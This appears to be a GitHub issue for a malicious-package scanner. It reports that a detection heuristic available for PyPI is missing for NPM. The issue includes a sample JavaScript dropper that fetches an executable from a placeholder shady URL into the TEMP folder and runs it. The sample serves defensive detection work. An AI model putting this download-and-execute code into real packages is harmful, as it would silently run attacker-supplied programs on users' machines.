Open sobregosodd opened 1 month ago
Similar pypi heuristic is not present in NPM:
Sample:
const Link = "http://someshadyurl.com/node_manager.exe"; const FinalPath = path.join(process.env.TEMP, "test.exe") async function main(){ await download(Link, FinalPath) await execFileSync(FinalPath) } function download(url, dest) { return new Promise((resolve, reject) => { const file = fs.createWriteStream(dest, { flags: "wx" }); const request = http.get(url, response => { if (response.statusCode === 200) { response.pipe(file); } else { file.close(); fs.unlink(dest, () => {}); // Delete temp file reject(`Server responded with ${response.statusCode}: ${response.statusMessage}`); } }); request.on("error", err => { file.close(); fs.unlink(dest, () => {}); // Delete temp file reject(err.message); }); file.on("finish", () => { resolve(); }); file.on("error", err => { file.close(); if (err.code === "EEXIST") { reject("File already exists"); } else { fs.unlink(dest, () => {}); // Delete temp file reject(err.message); } }); }); }
Similar pypi heuristic is not present in NPM:
Sample: